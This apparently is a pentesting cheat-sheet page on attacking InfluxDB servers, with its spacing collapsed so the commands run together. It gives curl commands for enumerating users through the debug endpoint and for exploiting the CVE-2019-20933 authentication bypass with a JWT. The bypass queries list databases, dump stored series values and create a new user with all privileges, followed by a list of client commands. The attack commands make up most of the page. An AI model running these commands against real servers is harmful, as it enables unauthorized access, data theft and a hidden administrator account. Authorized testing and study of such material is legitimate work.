InfluxDB is a time series database written in Go. A default port is 8086.
Enumeration
# User enumerationcurlhttp://<target-ip>:8086/debug/requests
Connect
influx-host10.0.0.1-port8086influx-host10.0.0.1-port8086-database<database>influx-host10.0.0.1-port8086-username<username>-password<password># Import db fileinflux-pathexample.db
Authentication Bypass (CVE-2019-20933) version ≤ 1.7.6
Copy the generated JWT.
Now we can query the InfluxDB API.
INFLUXDB_JWT="<JWT>"# List databasescurlhttp://<target-ip>:8086/query-H"Authorization: Bearer $INFLUXDB_JWT"--data-urlencode'q=SHOW DATABASES'|jq# List seriest in the databasecurlhttp://<target-ip>:8086/query-H"Authorization: Bearer $INFLUXDB_JWT"--data-urlencode'db=<database>'--data-urlencode'q=SHOW SERIES'|jq# Get values in the seriescurlhttp://<target-ip>:8086/query-H"Authorization: Bearer $INFLUXDB_JWT"--data-urlencode'db=<database>'--data-urlencode'q=SELECT * FROM <series>'|jq# Create a privileged accountcurlhttp://<target-ip>:8086/query-H"Authorization: Bearer $INFLUXDB_JWT"--data-urlencode"q=CREATE USER tester with PASSWORD 'password' with ALL PRIVILEGES"
Commands
# Show command history> history# Show settings> settings# List databases> show databases# Show series information> show series# Show measurement information> show measurements# Show tag key information> show tag keys# Show field key information> show field keys# Switch to the database> use <database># Query in the database>select * from <series>